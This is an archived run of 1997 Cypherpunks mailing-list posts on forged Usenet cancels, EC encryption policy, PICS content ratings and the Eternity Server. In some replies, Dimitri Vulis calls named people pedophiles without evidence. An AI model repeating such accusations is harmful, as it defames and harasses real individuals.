Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 4 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> I'd like to nominate another candidate for the eternity server.

As would I.  Warner Brothers has been shutting down any sites that even
hint of sex in relation to any of there cartoon caritors.  Although thay
clame it is to enforce tradmarks thay only will go after sites with a
sexulial content.

I would like to suggest that some toon porn be mounted on the eturnaty
server.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+bFUaQK0ynCmdStAQEQEwQAo1osOwEUPRuusfaA3wuPab607vVXPeq2
HTmy6PiPUyNQBJQq+BUtjAWwha0UtfgctMmJT1T1D6KLdPwoQxzLUI46kC8lv917
tScxa8ASjAsNWWoM1s4ZPtSro2iiUNDxC0dlyBM1Hssf/quYWETqae+9FplMMMnB
d4SwKP3p+JI=
=l9NN
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Tue Aug  5 04:12:03 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Tue, 5 Aug 1997 19:12:03 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: <59kXae1w165w@bwalk.dm.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 4 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> ? the Platypus {aka David Formosa}  writes:

[...]

> > Haveing trubble working out what this line is,  as a flame it is limp
> > wristed, as a rebuttle it is pathtic.
> 
> Our frustration with the Cabal supporters is understandable.

It is, but that dosn't mean that you should stoop to such conterproductive
meathods.  A little bit of flear and a well resoned argument gose further
then a humourless flame.

[...]

> Pedophile Chris Lewis is a content censor.

I don't think Mr Lewis' algeded activerties with childeren have any
validity to the argument.  Calling him a 'Pedophile' or any other name is
not effective in changing my option about this mattor.

>  There are dozens of other examples.

As yet I have seen only the one, could you provide these other examples
where Chris Lewis has perposly canceled posts that he dosn't like.

[...]

> > Since Dr Vulis is the newsadmin of that site, the question is quite valid.

[...]

> I would like to be able to tell
> the rest of Usenet that these articles are not worth reading,

And if thay should deside the what is not work reading is not worth
storing?

[...]

> > Frees up diskspace + reducers propragtion.  May be a good thing.
> 
> A spew spreads to almost all the servers there are in minutes.

It seems to me more in the range of hours or days, esp in the case of
uucp sites wich don't connect often.

[...]

> > > We've got to receive repeated 
> > > blasts of forged cancels ten times the number of the offending posts?
> > 
> > Ergh?  There is only one cancel per post.
> 
> Were you around when Ausralia was knocked off the net by the cancels for the
> Cantor and Siegel "spam"?

There _is_ I'm talking about present tence.  Any anty spammer who dosn't
follow the convention is going to be stopped or losse there account (eg
David Richards).

>  Most of the forgers didn't follow the "$alz" convention (giving the
> forged cancel the message-id "cancel.".

I would argue that all cancels (not just 3rd party) should follow the
message id protocol.

[...]

> > Realy how about "Post to me your corefile for free porn."?
> 
> How about me posting under my own name, "E-mail your core file to Platypus
> for some free porn"?

This takes a little work,  you can't just reply to the email to get it in
my mail box,  gives the peaple who would do this a little more time to
think.  Thus reducing the amount of core files I would recive.

And yes if thay set the reply-to: feild of the message to me I do consider
it my post and cancelble from me.

> How about me posting under my own name or via an anonymous remailer, "Platypus
> is a spammer - complain to his ISP"?

Both uws.edu.au and acmeonnline would know these complants are bogus.

> Would you be justified in forgin cancels for these?

No.

> How about if someone posted your credit card numbers to Usenet?

I don't have a credit card for just that reson.  The creadit card securaty
system is so fundermently flawed as to be the equiverlent of sticking a
large sign on your forhead marked "ROB ME"

> I don't have an issue with anyone's .sig, especially Dr. Fomin's, but
> Net.Scum like Chris Lewis might use this as an excuse to declare your
> writings "spam".

Not a chance.  The PGP part changes every post, its within McQ, and I
write a content that is diffrent.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+bNCqQK0ynCmdStAQEY7gP+Pb5QqKJYdaORGmSVjZ6ZphWtTxMklJt8
LpugNAiDzQ9pegXLg3Sxc9km8SV4OGnrSU1+cE9o2B9xXbuqUWntA+5Pcij/hEyk
fLk+xq5qweYNKAukAMBtr5f2lXP1O9CVj/VMBb4n9XvvGg3KoaWjNT46TAPUCtjl
oShaO+JLFa8=
=F/Tv
-----END PGP SIGNATURE-----






From nobody at REPLAY.COM  Tue Aug  5 04:38:49 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 5 Aug 1997 19:38:49 +0800
Subject: EC Crypto Policy
Message-ID: <199708051039.MAA29310@basement.replay.com>



     EC Ministers Draw Up European Online Policy 

     August 5, 1997


     Newsbytes : by Steve Gold. 

     Following on from a conference held in Germany last
     month, representatives from 39 European countries have
     signed a declaration calling for the free flow of information. 

     The event, held between July 6-8 in Bonn, was called "Global
     Information Networks: Realizing the Potential," and was
     attended by 39 European ministers, as well as European
     Commission (EC) representatives from Japan, Russia, the US
     and Canada. 

     At the event, ministers focused on two main issues:
     encryption, and the censorship of illegal material such as child
     pornography on the Internet. 

     The declaration notes that there are a number of important
     differences between US and Europe on encryption and
     information privacy. 

     According to MacRoberts, the Edinburgh, Scotland-based
     information technology (IT) law firm, the declaration may not
     go down too well in US circles, since it is conceivable that
     the EC may block US-based businesses from conducting
     electronic commerce on the Internet. 

     According to officials with MacRoberts, this could result in
     European becoming isolated, rather than the EC teaching the
     US a lesson. 

     According to MacRoberts, the Bonn declaration calls for the
     free flow of information, whilst protecting the privacy of
     data, and a clear division of legal responsibility between the
     creators of Internet content and access providers, network
     operators and other intermediaries. 

     In addition, the declaration calls for the recognition of the
     necessity of strong encryption technology, to facilitate
     electronic commerce subject to "applicable law," and the
     introduction of consumer protection through self- regulation. 

     According to Joanna Noag-Thomson, an associate in
     MacRobert's Intellectual Property and Technology Law
     Group, the declaration deals with many of the issues in
     President Clinton's "Framework for Global Electronic
     Commerce" and, while the US and Europe appear to agree on
     many fundamental issues, important policy differences
     continue to exist, particularly in the areas of information
     privacy and encryption. 

     "The European stance on encryption is to be commended --
     the European Ministers' view is more commercially
     acceptable in that it recognizes that electronic commerce
     requires strong encryption technology," she said. 

     "At the same time, it recognizes that measures to restrict
     encryption should be proportionate At present, the US and
     Europe appear to have different views on what constitutes
     `proportionate' restrictions," she added. 

     According to Boag-Thomson, the EC has warned that, unless
     the US provides adequate protection of personal information,
     it may block any US-based entity from conducting electronic
     commerce on the Internet. 

     "The EU Data Protection Directive forbids data flow to
     countries outside the EU which do not offer adequate
     protection of personal information. Although data protection
     is extremely important, I hope that we in Europe will not find
     ourselves isolated from the rest of the world and that a
     solution to this problem can be found," she said. 

     (19970804/Press Contact: Joanna Boag-Thomson
     +44-141-332-9988; Fax +44-141-332- 8886; E-mail:
     joannab at macroberts.co.uk






From dformosa at st.nepean.uws.edu.au  Tue Aug  5 04:55:50 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Tue, 5 Aug 1997 19:55:50 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 4 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> wireinfo  writes:

[...]

> > You're not very bright are you David?
> 
> In my humble opinion David is pretty bright.  Unfortunately he's misguided
> about certain things.  

Thankyou,  I feel almost the same thing about you :D

> I think the extreme aversion to censorship (like that displayed by imp
> and myself) seldom arises in people who haven't themselves been victims
> of censorship

Dose threats from a multynatnatil corpration count?  Dose living in
Austrlia count?

> The current top "spam canceller", Rich Bland ("cosmo")

Jem seems to have gotten to the top of the list now.

[...]

> Most of the people who scream about their "hatred of spam" on news.* are not
> admins, but fairly recent users who figure that "fighting spam" is a cool 
> thing.

Meany of the "I'm pissed off with spam" peaple lack knowlige of the
conciquencers both social and technical of what thay are suggesting.  In
fact there are membours of the anty-cancelers that I trust more then
them.

That being said thouse that are in the center, are more resonable and are
worryed about there activeriese have my support.

[...]

> I was just pointing out that it's factually incorrect to use
> "admins" as a synonym for "anti-spammers".  

No sane person would suggest that (i.e. lots of peaple on usenet would
make that suggestion) because if it was true then we wouldn't have the
problems with agis or uunet.

> Many admins are pro-free speech.

I woundn't have it any other way.

[...]

> Chris Lewis and Dave Barr obth
> forge cancels for usenet articles that follow up on their articles and quote
> them, claiming "copyright violations".

This is interesting,  proof please.

[...]

> Once the offending articles are part of the spool on toher site, it's 
> pointless for me to issue cancels. 

Not even to free up diskspace?

> Note that both have happened:

I know.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+bVx6QK0ynCmdStAQG82gP+LuH2yOt+02VJDrNk0ZHo9Jxm3WoYbs6g
HcUNCWAlvUFn8PhGqCqdYGaxYrjVDQX4EwIzgvhvpmZ3KOuIQjTl4vWlThoLZ6Yr
HrpdGRwrdOzYI/Xd5JV4OPybRwqesEVwHiL2QbGu08g1enkwbwuEnkDXRQPbX+7e
cpYEAGEUL6o=
=R4gE
-----END PGP SIGNATURE-----






From jeffb at issl.atl.hp.com  Tue Aug  5 05:54:52 1997
From: jeffb at issl.atl.hp.com (Jeff Barber)
Date: Tue, 5 Aug 1997 20:54:52 +0800
Subject: "required" and "voluntary"
Message-ID: <199708051247.IAA08928@jafar.issl.atl.hp.com>



While following Wombat's link, I found this amusing piece:
    http://www.usatoday.com/life/cyber/tech/cta958.htm

Don't you just hate it when you're "required" to adopt "voluntary"
measures.


                                 oo
-----------------------------cut /\ here------------------------------

Bill would call for greater Net privacy protection

WASHINGTON - Many people who surf the Internet don't know that personal
information on them can be collected at the sites they visit. 

But that could change under a bill to be offered Wednesday by a key
telecommunications lawmaker which aims to give computer users greater
privacy protections. 

The bill by Rep. Billy Tauzin, R-La., would bar companies from disclosing
or using without consent people's medical and financial records, as well
as government information such as social security numbers that are
available online, said spokesman Ken Johnson. 

As chairman of the House Commerce Committee's telecommunications
subcommittee, Tauzin has considerable power to advance legislation
through the chamber. A hearing is planned for this fall. 

The bill also would require companies to adopt voluntary guidelines to
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protect computer users' privacy when personal and other information is
collected from them online for marketing purposes, Johnson said. 

Web site owners can use technology to track, for instance, hobbies and
buying habits of visitors. The owners can then sell the information to
advertisers and other interested parties without the consent or knowledge
of the computer user. 

The Federal Trade Commission is now looking into the issue. To
short-circuit any regulatory action, companies including Microsoft and
Netscape Communications, the biggest makers of Web browsers, have
proposed letting computer users specify what personal information they
are willing to share and with which Web sites. 

The bill also would require companies to adopt voluntary guidelines that
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
would help reduce junk e-mail, or "spamming" as it's called in cyberspace,
Johnson said. 

[snip]






From dlv at bwalk.dm.com  Tue Aug  5 08:40:03 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Aug 1997 23:40:03 +0800
Subject: Tim 1 - Joichi 0 - DreamMonger NULL / Re: Joichi gives up
In-Reply-To: <199708050445.NAA03179@eccosys.com>
Message-ID: 



Joichi Ito  writes:

> I said:
> >>but I'll stop now before I get bashed again.
>
> At 07:44 97/08/04 -0500, Jim Choate wrote:
> > If all it takes to take over the citizens of Japan is to bash them a little
> > then you folks are Doomed. Perhaps you have spent one too many days
> > hammering nails that stick up...
>
> I meant get bashed here... and I don't hammer nails. Hammers nail me.
> And it seems like there are US hammers too. "To a hammer everything
> looks like a nail."

Joi, you sound like one of those Usenet pedophiles.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From stewarts at ix.netcom.com  Wed Aug  6 01:47:39 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Wed, 6 Aug 1997 01:47:39 -0700 (PDT)
Subject: [ANNOUNCE] Another Bay Area August Cypherpunks Meeting -  Mountain View
Message-ID: <3.0.2.32.19970804234833.03077bcc@popd.ix.netcom.com>


At 12:03 PM 8/2/97 -0700, Lucky Green wrote:
>This month's SF Bay Area Cypherpunks meeting will take place at a new
>location. Please pay close attention to the directions.
>Saturday, August 9, 1997 at 1:00 PM PDT. [22:00 local]
>The Workshop tent, HIP'97 Campground, Almere, The Netherlands.

For those who aren't that HIP or Beyond HOPE, or are otherwise still in 
Western North America, Another SF Bay Area Cypherpunks Meeting will take 
place in Mountain View, at Printer's Ink on Castro Street.
Besides the usual Cypherpunks topics, the program will include the
	Small Brewers' Festival http://www.smallbrewersfest.com/
which will be taking place that day in Mountain View.
(An extremely serious program is anticipated, potentially followed by
The Reptiles and Jerry's Kids in Redwood City that night.)

If anybody brings a Metricom modem, we can try to connect with the
Netherlands meeting by PGPfone or the HIP'97 VRML server;
please let me know if you plan to bring one so we can conspire
about connectivity.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)





From declan at well.com  Tue Aug  5 11:16:11 1997
From: declan at well.com (Declan McCullagh)
Date: Wed, 6 Aug 1997 02:16:11 +0800
Subject: "Censor's Sensibility" sidebar, from Time Magazine
Message-ID: 




     _________________________________________________________________
                                      
   BUSTED!
   Some surprising sites get trapped in the filters

CyberPatrol
   
   (www.heritage.org/heritage/) The Heritage Foundation
   (www.mit.edu/activities/safe) M.I.T. free-speech society
   (news:clari.tw.health.aids) Reuters articles about AIDS

NetNanny

   (www.odci.gov/) U.S. Central Intelligence Agency
   (www.cs.cmu.edu/~spok/banned-books.html) Banned-books archive
   (www.now.org/) National Organization for Women
     _________________________________________________________________
                                      







From declan at well.com  Tue Aug  5 11:16:12 1997
From: declan at well.com (Declan McCullagh)
Date: Wed, 6 Aug 1997 02:16:12 +0800
Subject: "A new battle over keeping the Net clean," by J.Weber/LATimes
Message-ID: 





---------- Forwarded message ----------
Date: Tue, 5 Aug 1997 10:49:32 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship-announce at vorlon.mit.edu
Subject: "A new battle over keeping the Net clean," by J.Weber/LATimes


---------- Forwarded message ----------
Date: Tue, 5 Aug 1997 09:23:15 -0700 (PDT)
From: Jonathan Weber 
To: Declan McCullagh 
Subject: ratings story


Innovation/ Jonathan Weber 
 
A New Battle   Over Keeping   the Web Clean   

WASHINGTON

   When Congress passed the Internet  censorship law known as the  
Communications Decency Act early last year, the many companies, advocacy 
groups and individuals with a stake in the Internet rose up as one to 
challenge the measure in court. 
   But now that the U.S. Supreme Court has ruled the CDA 
unconstitutional, the victorious coalition is fracturing, and a bitter 
battle is being joined over the Clinton-backed effort to develop a rating 
and labeling system for the Internet.  
   On one side are the big, mainstream Internet and computer companies, 
led by America Online and Microsoft, which proclaim their eagerness to 
make cyberspace "safe for families.'' Lining up against them are 
free-speech advocates, including the American Civil Liberties Union and 
the American Library Assn., which see ratings systems as censorship 
tools. 
   It's not exactly a fair fight: Ratings proponents have popular 
opinion, the economic interests of the industry and the power of the 
presidency on their side. But here's a prediction: The free-speech forces 
will lose the battle, but they'll ultimately win the war. And with a 
little luck there won't be too much damage done in the interim. 
   The debate over ratings begins with a technology called PICS, which 
stands for "platform for Internet content selection.'' PICS is a 
mechanism for labeling Web pages according to their content. The labels 
can then be read by a software program, which in turn can block access to 
sites that have specific types of content. 
 
PICS itself is not a ratings system, but rather a     method for 
implementing a ratings system. The theory is that once PICS is in place 
throughout the Internet, a multiplicity of ratings systems would emerge. 
A Christian Coalition ratings system might block access to anything with 
any sexual content as well as certain political sites, for example, while 
another system might block only hard-core porn. Parents and others could 
easily choose. 
   So far, so good. There would be no law requiring Web sites to use PICS 
labels; the Clinton administration has stressed that any ratings plan 
would be voluntary. But parents and others would get a new toolone more 
robust and effective than existing software programs, such as 
CyberPatrol, that block out sites deemed unsuitable for kids. 
   The free speech purists have a philosophical objection even to this. 
""Ratings systems are developed to enable one individual to exercise 
control over what another person sees,'' says Marc Rotenberg, director of 
the Electronic Privacy Information Center. That might be OK for parents 
and their children, he allows, but such a tool will inevitably be used by 
public institutions and governmentsif not here then abroadto restrict 
speech. 
   An even bigger worry is that what's being sold as a voluntary system 
that will include a multiplicity of ratings systems is actually going to 
be an all-but-mandatory system that offers very few choices. 
   Consider, first of all, what happens to Web sites that decline to rate 
their pages. Any PICS-based filter would have to block all unrated pages. 
Already, ratings proponents are calling on the major search services, 
such as Yahoo, not to index unrated sites. Overseas Web services would 
face the choice of adopting a U.S. labeling system or forgoing access to 
any U.S. readers. Web publishers that didn't want to participate might 
suddenly find themselves in a deserted backwater of the network. 
   There's also the question of how disputes over ratings would be 
arbitrated. Sites would be self-rated, and in fact the vast majority of 
sites would have no incentive to misrepresent themselves. But what 
happens when some do anyway? Would it be a crime for a porn site to 
proclaim itself suitable for children? 
   At the moment, moreover, it doesn't appear that there are a variety of 
ratings systems under development representing different values. In fact, 
a system being created by the Recreational Software Advisory Council, a 
Microsoft-led industry group, is quickly emerging as a de facto standard. 
   The battles over how RSAC handles certain kinds of sites have only 
just begun, but to see the inevitable problems one need look no further 
than the ongoing discussion about news. 
 
N   ews sites, reasonably enough, don't want to rate     themselves. At 
the very least it would be impractical to label every page of a big news 
site every day to warn of violent or tasteless or otherwise disturbing 
content. And labeling news just doesn't seem very consistent with freedom 
of the press. 
   So the news organizations want to have a special news rating. Who 
qualifies for a news rating? Well, a committeeoperating under the 
auspices of the Internet Content Coalition, which represents a number of 
major publishers (including The Times)would decide. News organizations 
get together to decide who is and who isn't a news organization. Hmm. 
   In the face of these objections, the Clinton administration and the 
companies backing the ratings effort say that, first of all, something 
has to be done to stave off new legislation. If industry doesn't act, 
Congress will come up with "son of CDA,'' and this time it might hold up 
in court. 
   There are other motives too, though, namely a desire to expand the 
market. "Nothing is as important as making this medium 
family-friendly,'' America Online Chairman Steve Case declared here last 
week. 
   That's funny coming from him, because AOL owes much of its success to 
its decidedly un-family-friendly sex-chat rooms, but he's obviously 
decided that a clean image is important to further growth. The online 
giant is spearheading a two-day meeting here in October, where the 
ratings battle is likely to come to a head. 
   The administration and the big companies both want to bring the 
Internet into the mainstream. If some of its wilder and woollier aspects 
are marginalized in the process, well, good. 
   And that is the nightmare of free-speech advocates: that a medium that 
the Supreme Court declared ought to be treated at least as liberally as 
print (ever heard of ratings for books?) will nonetheless be driven into 
TV-like conformity. 
This is a legitimate fear. Personally, though, I don't     think the 
worst will happen. The Internet is simply too big, too diverse and too 
fast-changing to be tamed by even a semi-voluntary ratings mechanism. The 
business interests, moreover, cut both ways: Family-friendly might look 
like a way to expand the market today, but pornography and gambling and 
even radical politics are sure to remain a big part of the online 
landscape. 
   AOL's Case says that online service providers competing on the basis 
of who is more family-friendly would be akin to airlines competing based 
on their safety records. That's a ridiculous analogy: Everyone thinks 
plane crashes are bad, but not everyone feels the same way about controls 
on Internet content. 
   In my ideal world, Internet providers should be competing based on 
values, not trying to impose some kind of bogus consensus. 
   Esther Dyson, one of the industry's most respected thinkers, favors 
the development of PICS as a tool but stresses the importance of 
choicesand of people taking responsibility for their actions. In the 
wired world, she says, power is constantly shifting and devolving away 
from central authorities, and that requires individuals to be less 
passive: "I want local control,'' she says. "I don't want no control.'' 
   PICS and RSAC have powerful forces behind them and stand a good chance 
of establishing themselves as part of the mainstream Internet. But 
there's a natural tendency toward diversity in cyberspace, and it's hard 
to see how they would become ubiquitous. 
   If individuals and organizations are vigilant about how ratings are 
usedi.e., not by governments and not by public institutions such as 
librariesthere's a chance that they'll remain what they were originally 
intended to be: one of many means for people to manage the often 
unmanageable Internet. 
 
   Jonathan Weber (Jonathan.Weber at latimes.com) is editor of The Cutting 
Edge. 


**********************************************************************

Jonathan Weber
Jonathan.Weber at latimes.com
Technology Editor
Los Angeles Times 










From stewarts at ix.netcom.com  Tue Aug  5 13:29:31 1997
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Wed, 6 Aug 1997 04:29:31 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <19970802092944.06562@bywater.songbird.com>
Message-ID: <3.0.2.32.19970805102802.0077fe24@popd.ix.netcom.com>



>Kent Crispin  writes:
>> In more general terms: A "free market" fundamentally grants more
>> control to those with more money.  Postage of whatever variety turns
>> the medium over to those with more money.  That would, in my opinion, 
>> fundamentally alter the character of email in a strongly negative 
>> direction. 

More to the point, if you're charging prices that don't reflect the
true costs of the activities, it'll catch up with you after a while;
either the Tacky People will find a way to siphon money out of the system
by some variant on spamming, or it won't have the same community you're 
looking for, because it's only used by people willing to pay extra for 
the service, or because the information flow that used to be provided free
gets stifled, or somebody will offer a competing system that offers 
similar features at a lower cost, or whatever.

Somehow Usenet has survived growing from a system small enough to read
all the mail to a system with gigabytes of traffic per day,
and it's still possible to find some signal among the noise
(though the Web has siphoned off much of that signal.)
And we've grown from tens of thousands of students and defense contractors
on the Arpanet and UUCP and Fido nets and BBSs to tens of millions of 
users on the Internet.  Filtering tools help find the interesting
parts of the global discussion, and make it easier to get rid of
the uninteresting parts.  

The present situation is that the social dynamics and economics are such
that Tacky People can make money by being rude to everyone without being 
interesting in return.  While trying to charge money for communications
may work, I'm inclined to doubt it; the more interesting currency to
try to model is Reputation, which leads to more like an Ender's Game
kind of net, or to semi-closed communities like the Well (is?was?).


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From dformosa at st.nepean.uws.edu.au  Tue Aug  5 14:06:51 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Wed, 6 Aug 1997 05:06:51 +0800
Subject: "Censor's Sensibility" sidebar, from Time Magazine
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 5 Aug 1997, Declan McCullagh wrote:

> NetNanny
> 
>    (www.odci.gov/) U.S. Central Intelligence Agency

Is thats where the world fact book is mounted?  It would be a pitty that
this usefull resurch tool would be blocked.  I mean thay might find out
that the CIA consideres every single country in the world a magour transit
point for drugs.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+dVFKQK0ynCmdStAQGSvwP9HLq/s8Xk/thxwcJDC7sQJL1Zd8r/vBNX
zmUeTwPazpc2Lw88dywH6D3hUD7+abn1I+Iw0OqVZDzNjN5yb8b2mSPpXribCqfI
ag4Rx7BjmnWq4rsJRaxtA3GOliKPvbP09Lmq3zDYm2DRz+24bVcWoibyls7BkAAd
c3SU7XmUG3Q=
=s7At
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Tue Aug  5 14:11:08 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Wed, 6 Aug 1997 05:11:08 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <3.0.2.32.19970805102802.0077fe24@popd.ix.netcom.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 5 Aug 1997 stewarts at ix.netcom.com wrote:

[...]

> While trying to charge money for communications
> may work, I'm inclined to doubt it; the more interesting currency to
> try to model is Reputation, which leads to more like an Ender's Game
> kind of net, or to semi-closed communities like the Well (is?was?).

The semi-closed communities are forming even now.  Usenet2, the fur
hyrackies and the hyracky that shall not be named are all examples of
this.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+dX+qQK0ynCmdStAQHLgQQAuctUCLt5CIUEkC0TzkrRcNtm0zjQwvQb
9QcfDNRcXnOyvRLnWEnM5hstA/Car7+7v+A2abLl/klMptSBmRKMeuScdMHu3n6w
eohX22T1WzV49DCO0WIGMVkuPefxEoF13zGUASacNkFB/TwNliOw7KTnI2MpCJqC
c/aF7V7kxxE=
=7ZQn
-----END PGP SIGNATURE-----






From alan at ctrl-alt-del.com  Tue Aug  5 14:28:20 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Wed, 6 Aug 1997 05:28:20 +0800
Subject: "Censor's Sensibility" sidebar, from Time Magazine
In-Reply-To: 
Message-ID: 



On Wed, 6 Aug 1997, ? the Platypus {aka David Formosa} wrote:

> > NetNanny
> > 
> >    (www.odci.gov/) U.S. Central Intelligence Agency
> 
> Is thats where the world fact book is mounted?  It would be a pitty that
> this usefull resurch tool would be blocked.  I mean thay might find out
> that the CIA consideres every single country in the world a magour transit
> point for drugs.

Especially the evil designer drugs TCP and UDP.  Some countries try to
block them at their borders, but they always seem to route around it.

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From feanor at nym.alias.net  Tue Aug  5 14:32:18 1997
From: feanor at nym.alias.net (Feanor)
Date: Wed, 6 Aug 1997 05:32:18 +0800
Subject: Question: What's with cypherpunks-unedited?
Message-ID: <19970805211314.15653.qmail@nym.alias.net>



Just wondering what the story was behind the split and subsequent going-away of
cypherpunks at toad.com?

Also, I'm getting about 20 msgs a day: is that correct or is my gateway broken
again?

Thanks!

-Robin






From ariel at watsun.cc.columbia.edu  Tue Aug  5 14:33:35 1997
From: ariel at watsun.cc.columbia.edu (Ariel Glenn)
Date: Wed, 6 Aug 1997 05:33:35 +0800
Subject: eternity server makes wired
Message-ID: 



Good going, guys...

http://www.wired.com/news/news/technology/story/5778.html


   [Masthead]
   []
   [Navigation bar]
   [Stocks] __________
   ______________
   
   
   [Search] [WIRED magazine]
   []
   [Back] Creating Anonymous Sites That Can't Be Revoked
   
   by Michael Stutz 
   12:05pm  5.Aug.97.PDT Web sites, having a physical, traceable
   location, are always subject to censorship. In such attacks, a
   government or other localized entity orders the removal of - or even
   physically raids - those sites which host non-approved content within
   its sovereign borders; these sites are often forced to "unpublish" or
   destroy such information.
   
   Now, a means of creating anonymous, unrevokable Web sites has been
   developed. Originally proposed in theory by UK cryptologist Ross
   Anderson, the Eternity Server is being implemented by a band of
   cypherpunks including Adam Back, a research fellow at Exeter
   University.
   
   The idea is simple. Web content - even entire sites - can be posted to
   Usenet in such a way that it can be easily retrieved.
   
   Usenet's discussion forums are distributed across thousands of news
   servers around the world. This, it turns out, makes for a perfect,
   anonymous digital repository: "No one knows who's reading it," said
   Back. "They can't find all Eternity Servers from some centralized
   list. It's decentralized, unlike a mailing list, where there is a
   central node which can be taken out."
   
   The mechanics of document submission are as follows: Eternity Service
   recognizes its own fictitious top-level domain, .eternity. From there,
   a Web document is given its own virtual URL, and the subject line of
   the message becomes a unique mathematical representation of that
   virtual URL, from which the document can be retrieved using search
   techniques. Furthermore, the message is encrypted so that knowledge of
   this URL is necessary for decryption.
   
   Once posted to Usenet, the document will be viewable in perpetuity and
   can be reconstructed in a Web browser by any Eternity Server program,
   which simply decodes the .eternity URL into its equivalent Usenet
   message, then fetches, decrypts, and displays it. Eternity supports
   digital signatures to maintain author anonymity, allowing for
   unconditional free speech.
   
   Mike Duvos, a Seattle-area computer-software consultant, is an
   Eternity Service user. He sees this as part of Usenet's ongoing
   evolution, just as it previously changed from a text-only medium to
   include binary files as well.
   
   "Establishing a convention for the posting of Web content to Usenet,
   employing modern encryption and authentication tools, and permitting
   transparent browsing of that content, is just another step in the same
   direction," he said.
   
   While still fresh out of beta, the technique shows a great deal of
   promise as a foil to conventional means of censorship. "The attention
   gathered by censoring an Eternity Server will ensure that lots of
   other servers start up," said Back. "It will generate a feeding frenzy
   of new servers springing up," he said, assisting free speech from here
   - to Eternity.
   
   Find related stories from the Web's top news sites with NewBot
   
   [Back] [Navigation strip]
   
   Feedback: Let us know how we're doing.
   
   Tips: Have a story or tip for Wired News? Send it.
   
   Copyright ) 1993-97 Wired Ventures Inc. and affiliated companies.
   All rights reserved.
   
   [HotWired and HotBot]
   [] []
   Click here for Vivo
   
   [technology]
   TECHNOLOGY
   Today's Headlines
   
   Creating Anonymous Sites That Can't Be Revoked
   
   Microsoft Reportedly Entering Net Search Biz
   
   Macromedia Offers Dynamic HTML Helper
   
   NCR Licenses Solaris
   
   Testimony Gets Animated
   
   MP3 Music Pirates Lurk in Chat Zones
   
   Eword: Doctor Roboto
   
   Outta Beta: Community Building Blocks
   
   
   Click here for Vivo [INLINE]

------

Ariel Glenn / AcIS R&D / Columbia University
ariel at columbia.edu
standard disclaimer, blah blah blah...






From bpettigrew at usa.net  Tue Aug  5 14:48:37 1997
From: bpettigrew at usa.net (bpettigrew at usa.net)
Date: Wed, 6 Aug 1997 05:48:37 +0800
Subject: "A new battle over keeping the Net clean," by J.Weber/LATimes
Message-ID: 



>At the moment, moreover, it doesn't appear that there are a variety 
of 
>ratings systems under development representing different values. In 
fact, 
>a system being created by the Recreational Software Advisory Council, 
a 
